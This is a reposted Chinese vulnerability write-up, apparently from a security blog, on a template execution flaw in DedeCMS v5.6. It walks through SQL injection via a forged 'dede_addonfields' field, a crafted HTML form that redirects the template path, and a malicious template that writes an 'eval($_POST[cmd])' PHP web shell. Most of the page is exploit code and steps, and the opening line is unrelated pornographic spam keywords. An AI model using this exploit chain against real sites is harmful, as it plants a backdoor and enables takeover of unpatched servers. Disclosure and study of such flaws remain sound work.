亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

DEDECMS網(wǎng)站管理系統(tǒng)模板執(zhí)行漏洞(影響版本v5.6)

  發(fā)布時間:2011-10-10 01:16:38   作者:佚名   我要評論
DedeCms 基于PHP+MySQL的技術(shù)開發(fā),支持Windows、Linux、Unix等多種服務(wù)器平臺,從2004年開始發(fā)布第一個版本開始,至今已經(jīng)發(fā)布了五個大版本
影響版本:
DEDECMS v5.6 Final

程序介紹:
DedeCms 基于PHP+MySQL的技術(shù)開發(fā),支持Windows、Linux、Unix等多種服務(wù)器平臺,從2004年開始發(fā)布第一個版本開始,至今已經(jīng)發(fā)布了五個大版本。DedeCms以簡單、健壯、靈活、開源幾大特點占領(lǐng)了國內(nèi)CMS的大部份市場,目前已經(jīng)有超過二十萬個站點正在使用DedeCms或居于DedeCms核心,是目前國內(nèi)應(yīng)用最廣泛的php類CMS系統(tǒng)。

漏洞分析:

Dedecms V5.6 Final版本中的各個文件存在一系列問題,經(jīng)過精心構(gòu)造的含有惡意代表的模板內(nèi)容可以通過用戶后臺的上傳附件的功能上傳上去,然后通過SQL注入修改附加表的模板路徑為我們上傳的模板路徑,模板解析類:include/inc_archives_view.php沒有對模板路徑及名稱做任何限制,則可以成功執(zhí)行惡意代碼。

1、member/article_edit.php文件(注入):
//漏洞在member文件夾下普遍存在,$dede_addonfields是由用戶提交的,可以被偽造,偽造成功即可帶入sql語句,于是我們可以給附加表的內(nèi)容進(jìn)行update賦值。
PHP Code復(fù)制內(nèi)容到剪貼板
  1. …      
  2. //分析處理附加表數(shù)據(jù)      
  3.     $inadd_f = '';      
  4.     if(!emptyempty($dede_addonfields))//自己構(gòu)造$dede_addonfields      
  5.     {      
  6.         $addonfields = explode(';',$dede_addonfields);      
  7.         if(is_array($addonfields))      
  8.         {      
  9.             print_r($addonfields);      
  10.             foreach($addonfields as $v)      
  11.             {      
  12.                 if($v=='')      
  13.                 {      
  14.                     continue;      
  15.                 }      
  16.                 $vs = explode(',',$v);      
  17.                 if(!isset(${$vs[0]}))      
  18.                 {      
  19.                     ${$vs[0]} = '';      
  20.                 }      
  21.                 ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);      
  22.                 $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";      
  23.                 echo $inadd_f;      
  24.             }      
  25.         }      
  26.     }      
  27. …      
  28. if($addtable!='')      
  29.     {      
  30.         $upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";//執(zhí)行構(gòu)造的sql      
  31.         if(!$dsql->ExecuteNoneQuery($upQuery))      
  32.         {      
  33.             ShowMsg("更新附加表 `$addtable`  時出錯,請聯(lián)系管理員!","javascript:;");      
  34.             exit();      
  35.         }      
  36.     }      
  37. …   
2、include/inc_archives_view.php:
//這是模板處理類,如果附加表的模板路徑存在,直接從附加表取值;GetTempletFile獲取模板文件的方法就是取的此處的模板路徑,從來帶進(jìn)去解析。
PHP Code復(fù)制內(nèi)容到剪貼板
  1. …      
  2. //issystem==-1 表示單表模型,單表模型不支持redirecturl這類參數(shù),因此限定內(nèi)容普通模型才進(jìn)行下面查詢      
  3.             if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)      
  4.             {      
  5.                 if(is_array($this->addTableRow))      
  6.                 {      
  7.                     $this->Fields['redirecturl'] = $this->addTableRow['redirecturl'];      
  8.                     $this->Fields['templet'] = $this->addTableRow['templet'];//取值      
  9.                     $this->Fields['userip'] = $this->addTableRow['userip'];      
  10.                 }      
  11.                 $this->Fields['templet'] = (emptyempty($this->Fields['templet']) ? '' : trim($this->Fields['templet']));      
  12.                 $this->Fields['redirecturl'] = (emptyempty($this->Fields['redirecturl']) ? '' : trim($this->Fields['redirecturl']));      
  13.                 $this->Fields['userip'] = (emptyempty($this->Fields['userip']) ? '' : trim($this->Fields['userip']));      
  14.             }      
  15.             else      
  16.             {      
  17.                 $this->Fields['templet'] = $this->Fields['redirecturl'] = '';      
  18.             }      
  19. …      
  20.       
  21.     //獲得模板文件位置      
  22.     function GetTempletFile()      
  23.     {      
  24.         global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;      
  25.         $cid = $this->ChannelUnit->ChannelInfos['nid'];      
  26.         if(!emptyempty($this->Fields['templet']))      
  27.         {      
  28.             $filetag = MfTemplet($this->Fields['templet']);      
  29.             if( !ereg('/'$filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;      
  30.         }      
  31.         else      
  32.         {      
  33.             $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);      
  34.         }      
  35.         $tid = $this->Fields['typeid'];      
  36.         $filetag = str_replace('{cid}'$cid,$filetag);      
  37.         $filetag = str_replace('{tid}'$tid,$filetag);      
  38.         $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;      
  39.         if($cid=='spec')      
  40.         {      
  41.             if( !emptyempty($this->Fields['templet']) )      
  42.             {      
  43.                 $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;      
  44.             }      
  45.             else      
  46.             {      
  47.                 $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";      
  48.             }      
  49.         }      
  50.         if(!file_exists($tmpfile))      
  51.         {      
  52.             $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/".($cid=='spec' ? 'article_spec.htm' : 'article_default.htm');      
  53.         }      
  54.         return $tmpfile;      
  55.     }    
漏洞利用:

1.上傳一個模板文件:

注冊一個用戶,進(jìn)入用戶管理后臺,發(fā)表一篇文章,上傳一個圖片,然后在附件管理里,把圖片替換為我們精心構(gòu)造的模板,比如圖片名稱是:
uploads/userup/2/12OMX04-15A.jpg

模板內(nèi)容是(如果限制圖片格式,加gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2.修改剛剛發(fā)表的文章,查看源文件,構(gòu)造一個表單:
XML/HTML Code復(fù)制內(nèi)容到剪貼板
  1. <form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">      
  2. <input type="hidden" name="dopost" value="save" />      
  3. <input type="hidden" name="aid" value="2" />      
  4. <input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />      
  5. <input type="hidden" name="channelid" value="1" />      
  6. <input type="hidden" name="oldlitpic" value="" />      
  7. <input type="hidden" name="sortrank" value="1275972263" />      
  8. <div id="mainCp">      
  9. <h3 class="meTitle"><strong>修改文章</strong></h3>      
  10. <div class="postForm">      
  11. <label>標(biāo)題:</label>      
  12. <input  name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>      
  13. <label>標(biāo)簽TAG:</label>      
  14. <input name="tags" type="text" id="tags"  value="hahah,test" maxlength="100" class="intxt"/>(用逗號分開)      
  15. <label>作者:</label>      
  16. <input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>      
  17. <label>隸屬欄目:</label>      
  18. <select name='typeid' size='1'>      
  19. <option value='1' class='option3' selected=''>測試欄目</option>      
  20. </select>            <span style="color:#F00">*</span>(不能選擇帶顏色的分類)      
  21. <label>我的分類:</label>      
  22. <select name='mtypesid' size='1'>      
  23. <option value='0' selected>請選擇分類...</option>      
  24. <option value='1' class='option3' selected>hahahha</option>      
  25. </select>      
  26. <label>信息摘要:</label>      
  27. <textarea name="description" id="description">1111111</textarea>      
  28. (內(nèi)容的簡要說明)      
  29. <label>縮略圖:</label>      
  30. <input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);"  maxlength="100" class="intxt"/>      
  31. <input type='text' name='templet'      
  32. value="../ uploads/userup/2/12OMX04-15A.jpg">      
  33. <input type='text' name='dede_addonfields'      
  34. value="templet,htmltext;">(這里構(gòu)造)      
  35. </div>      
  36. <!-- 表單操作區(qū)域 -->      
  37. <h3 class="meTitle">詳細(xì)內(nèi)容</h3>      
  38. <div class="contentShow postForm">      
  39. <input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>      
  40. <label>驗證碼:</label>      
  41. <input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />      
  42. <img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?點擊更換" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+'?'" />      
  43. <button class="button2" type="submit">提交</button>      
  44. <button class="button2 ml10" type="reset" onclick="location.reload();">重置</button>      
  45. </div>      
  46. </div>      
  47. </form>   
提交,提示修改成功,則我們已經(jīng)成功修改模板路徑。

3.訪問修改的文章:

假設(shè)剛剛修改的文章的aid為2,則我們只需要訪問:
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目錄下生成小馬:1.php

解決方案:
廠商補(bǔ)丁:
DEDECMS
------------
目前廠商還沒有提供補(bǔ)丁或者升級程序,我們建議使用此軟件的用戶隨時關(guān)注廠商的主頁以獲取最新版本:
http://www.dedecms.com/

信息來源: oldjun's Blog

相關(guān)文章

最新評論